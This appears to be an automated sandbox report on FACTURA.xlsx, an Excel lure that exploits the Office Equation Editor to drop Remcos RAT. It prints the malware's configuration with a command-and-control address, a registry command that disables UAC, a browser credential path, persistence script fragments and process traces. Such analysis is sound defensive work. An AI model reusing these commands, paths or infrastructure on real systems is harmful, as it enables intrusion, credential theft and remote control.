
Windows Analysis Report
FACTURA.xlsx

Overview

General Information

Sample name: FACTURA.xlsx
Analysis ID: 1572126
MD5: 0c7d9bbd0cfe3621f076aae883009e36
SHA1: 58d9da251f4466a6cd9fb7fb7f0cbb196425db2e
SHA256: b326ee834d3e9c27a5712b91bf28ac789ea8f715dfd17cca0cd6d0cc5ef18c9f
Tags: xlsx, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for JavaScript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3532 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3680 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • kudo.exe (PID: 3844 cmdline: "C:\Users\user\AppData\Local\Temp\kudo.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
        • outvaunts.exe (PID: 3860 cmdline: "C:\Users\user\AppData\Local\Temp\kudo.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
          • outvaunts.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
            • outvaunts.exe (PID: 3912 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
              • outvaunts.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                • outvaunts.exe (PID: 3932 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                  • outvaunts.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                    • outvaunts.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                      • outvaunts.exe (PID: 3960 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                        • outvaunts.exe (PID: 3972 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                          • outvaunts.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                            • outvaunts.exe (PID: 3988 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                              • outvaunts.exe (PID: 4036 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                • outvaunts.exe (PID: 4060 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                  • outvaunts.exe (PID: 4072 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                    • outvaunts.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                      • outvaunts.exe (PID: 3084 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                        • outvaunts.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                          • outvaunts.exe (PID: 3148 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                            • outvaunts.exe (PID: 3192 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                              • outvaunts.exe (PID: 3224 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                                • outvaunts.exe (PID: 3240 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                                                  • outvaunts.exe (PID: 3260 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
  • wscript.exe (PID: 4000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • outvaunts.exe (PID: 4044 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
      • outvaunts.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
        • outvaunts.exe (PID: 4080 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
          • outvaunts.exe (PID: 2884 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
            • outvaunts.exe (PID: 3100 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
              • outvaunts.exe (PID: 3132 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                • outvaunts.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                  • outvaunts.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                    • outvaunts.exe (PID: 3208 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                      • outvaunts.exe (PID: 3272 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
                        • outvaunts.exe (PID: 2504 cmdline: "C:\Users\user\AppData\Local\complacence\outvaunts.exe" MD5: D6B16370CD4E60185AA88607316A0C05)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author
00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author
30.2.outvaunts.exe.1190000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
30.2.outvaunts.exe.1190000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
30.2.outvaunts.exe.1190000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
30.2.outvaunts.exe.1190000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
30.2.outvaunts.exe.1190000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]

              Exploits

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3680, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe

              System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 161.132.57.101, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3680, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\kudo.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\kudo.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\kudo.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , ProcessId: 3844, ProcessName: kudo.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\kudo.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\kudo.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\kudo.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\kudo.exe" , ProcessId: 3844, ProcessName: kudo.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 4000, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 4000, ProcessName: wscript.exe
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3680, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\complacence\outvaunts.exe, ProcessId: 3860, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T07:04:57.871930+0100 | 2001046 | 3 | Misc activity | 161.132.57.101 | 443 | 192.168.2.22 | 49163 | TCP


              AV Detection

Source: FACTURA.xlsx | Avira: detected
Source: 22.2.outvaunts.exe.800000.0.raw.unpack | Malware Configuration Extractor: Remcos (same configuration as listed under the Remcos entry above)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\kudo.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | ReversingLabs: Detection: 57%
Source: FACTURA.xlsx | ReversingLabs: Detection: 63%
Source: FACTURA.xlsx | Virustotal: Detection: 45%
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe | Joe Sandbox ML: detected
              Source: outvaunts.exe, 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 161.132.57.101 Port: 443
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Local\Temp\kudo.exe
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: unknown | HTTPS traffic detected: 161.132.57.101:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0086445A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086C6D1 FindFirstFileW,FindClose,5_2_0086C6D1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0086C75C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086EF95
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086F0F2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086F3F3
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_008637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008637EF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_00863B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00863B12
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe | Code function: 5_2_0086BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086BCBC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013C445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_013C445A
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_013CC75C
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013CC6D1 FindFirstFileW,FindClose,6_2_013CC6D1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_013CEF95
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_013CF0F2
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_013CF3F3
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_013C37EF
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_013C3B12
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe | Code function: 6_2_013CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_013CBCBC

              Software Vulnerabilities

